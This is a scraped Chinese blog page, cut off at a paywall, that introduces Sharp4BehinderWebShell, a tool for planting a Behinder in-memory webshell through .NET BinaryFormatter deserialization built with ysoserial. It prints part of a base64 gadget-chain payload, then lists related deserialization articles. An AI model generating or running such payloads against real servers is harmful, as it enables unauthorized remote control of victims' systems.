.NET 一款反序列化打入冰蝎内存马的工具

最新推荐文章于 2025-05-11 17:32:44 发布
最新推荐文章于 2025-05-11 17:32:44 发布
阅读量1.2k 收藏 21
点赞数 16
CC 4.0 BY-SA版权
文章标签: 安全 矩阵 web安全 .net
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ahhacker86/article/details/140839829

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4BehinderWebShell 是一款利用.NET反序列化漏洞向内存中植入冰蝎WebShell的工具。通过这种方式,可以使用冰蝎客户端连接内存马获取WebShell,并且支持在.NET预编译环境下使用。以下是对该工具的详细介绍,包括其使用方法和代码解释。

图片

03使用方法

使用ysoserial生成冰蝎内存马的反序列化攻击负载,用于触发漏洞部分。以下是一个通过BinaryFormatter触发反序列化漏洞的示例负载,由于比较长此处仅展示一部分内容。

AAEAAAD/AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdG..................
最低0.47元/天 解锁文章
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3579
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
反序列化工具
11-14
测试java反序列化工具很好用,下载插件一键监测就可以提升漏洞
.net 序列化 反序列化
04-06
NULL 博文链接:https://dampce032.iteye.com/blog/1553453
.Net 中的序列化与反序列化
在0与1之间的博客
03-18 611
一、概述    当两个进程在进行远程通信时,彼此可以发送各种类型的数据。无论是何种类型的数据,都会以二进制序列的形式在网络上传送。发送方需要把这个对象转换为字节序列,才能在网络上传送;接收方则需要把字节序列再恢复为对象。    把对象转换为字节序列的过程称为对象的序列化。    把字节序列恢复为对象的过程称为对象的反序列化。    二、对象的序列化主要有两种用途:    1) 把对象的字节序列
深入理解反序列化攻击:原理、示例与利用工具实战
最新发布
2201_75445650的博客
05-11 1188
序列化是将内存中的数据结构(对象)转化为字符串或二进制,以便存储或传输。反序列化则是将序列化后的数据重新恢复为原来的对象结构。许多编程语言(如 PHP、Java、Python)都内置了序列化/反序列化机制。s:4:"role";s:4:"root";// 恢复为数组");反序列化攻击是一类“只要存在入口就可能打穿”的严重漏洞。尤其在现代框架广泛引入“魔术方法”和自动对象映射的背景下,开发者应特别警惕反序列化行为,避免暴露攻击面。
.net反序列化新手入门--Json.Net
小王的储物间
01-17 698
Json.net即Newtonsoft.Json,是.Net中开源的Json序列化和反序列化工具,官方地址:http://www.newtonsoft.com/json。它虽然不是官方库,但凭借其优秀的性能获得了广大开发者的喜爱。使用Json.net的项目,JsonSerializer的TypeNameHandling值只要不为None,即可能存在反序列化漏洞。ObjectDataProvider攻击向量在.net反序列化中会经常用到。1、网络安全理论知识(2天)
.net反序列化入门--BinaryFormatter
二狗的博客
03-15 594
BinaryFormatter反序列化还有许多攻击链,但大多都是在TextFormattingRunProperties链的基础上进行相应的封装。而TextFormattingRunProperties则是封装的XamlReader.Parse(),借助ObjectDataProvider的Xamlpayload可以实现代码执行。也就是说,我们在使用BinaryFormatter反序列化TextFormattingRunProperties封装的数据时,最终会落到XamlReader进行反序列化
.net反序列化入门—BinaryFormatter
阿道夫的博客
03-15 1122
BinaryFormatter反序列化还有许多攻击链,但大多都是在TextFormattingRunProperties链的基础上进行相应的封装。而TextFormattingRunProperties则是封装的XamlReader.Parse(),借助ObjectDataProvider的Xamlpayload可以实现代码执行。也就是说,我们在使用BinaryFormatter反序列化TextFormattingRunProperties封装的数据时,最终会落到XamlReader进行反序列化
.NET反序列化利用链萌新入门——XmlSerializer
Innocence_0的博客
07-21 383
1.如果new XmlSerializer(type)的type可控,即可能存在反序列化漏洞。2.通过XamlReader.Parse()绕过Process无法序列化的问题。在其他攻击链中还会用到。
Json序列化反序列化工具:JsonToolsJson序列化反序列化工具:JsonTools Json序列化反序列化工具:JsonTools
05-03
JsonTools是一个不错的JSON序列化和反序列化功能包
java反序列化利用工具
07-06
java反序列化 weblogic反序列化
.NET序列化 serializable,反序列化 Newtonsoft
u013400314的博客
09-02 1181
web 请求服务器,是不能传递跟客户端那种{传递任意类型的数据【类】等},只能传递字符串、或字节流等,反正传递过去不能 .XXX成员这样方式的,序列化到服务器端,反序列化,服务器需要对应的类型的。XML/JSON序列化不受编程语言限制,C#使用XML/JSON序列化后的数据JAVA可以很容易的按照XML或JSON的格式反序列化得到所需数据。如果对象标记为 Serializable,则该对象将被自动序列化,并从一个应用程序域传输至另一个应用程序域,然后。:与序列化相反,将流转换为对象的过程。
学习笔记-.net安全之XmlSerializer反序列化
人饭子的博客
11-07 1002
0x00 简介 反序列化学习主要用到如下资料: 1..NET反序列化payload生成工具ysoserial.net。 2.attacking-net-serialization其中列举了多种反序列化漏洞。 3.BH_US_12_Forshaw_Are_You_My_Type_WP.pdf 0x01 XmlSerializer序列化 System.Xml.Serialization.XmlS...
Java反序列化工具
weixin_34326429的博客
03-29 239
为什么80%的码农都做不了架构师?>>> ...
php 反序列化工具
wmnmtm的专栏
03-05 598
调试代码,经常需要打印变量,今天写了一个简单的反序列化页面,存下来用的时候方便。<html><header><title>反序列化工具</title><style>td{line-height:30px;}</style></header><body><form name=
Json.net 反序列化 部分对象
正怒月神的博客
03-14 939
主要通过 Jobject获取想要序列化的部分对象。直接上代码static void Main(string[] args) { //先反序列化看看 string json = "{\"name\": true,\"age\": \"success\",\"hobby\": [{\"obj1\": \"6\",\"obj2\&quo
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

dot.Net安全矩阵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值